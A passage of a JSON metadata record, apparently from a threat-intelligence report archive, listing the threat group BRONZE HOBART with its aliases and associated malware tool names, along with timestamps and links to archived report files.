				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "86182dd7-646c-49c5-91a6-4b62fd2119a7",
			"created_at": "2025-08-07T02:03:24.617638Z",
			"updated_at": "2026-04-10T02:00:03.738499Z",
			"deleted_at": null,
			"main_name": "BRONZE HOBART",
			"aliases": [
				"APT23",
				"Earth Centaur ",
				"KeyBoy ",
				"Pirate Panda ",
				"Red Orthrus ",
				"TA413 ",
				"Tropic Trooper "
			],
			"source_name": "Secureworks:BRONZE HOBART",
			"tools": [
				"Crowdoor",
				"DSNGInstaller",
				"KeyBoy",
				"LOWZERO",
				"Mofu",
				"Pfine",
				"Sepulcher",
				"Xiangoop Loader",
				"Yahaoyah"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434348,
	"ts_updated_at": 1775792000,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d29ffab19faa011ce3afc093ff0b087f3f33763f.pdf",
		"text": "https://archive.orkl.eu/d29ffab19faa011ce3afc093ff0b087f3f33763f.txt",
		"img": "https://archive.orkl.eu/d29ffab19faa011ce3afc093ff0b087f3f33763f.jpg"
	}
}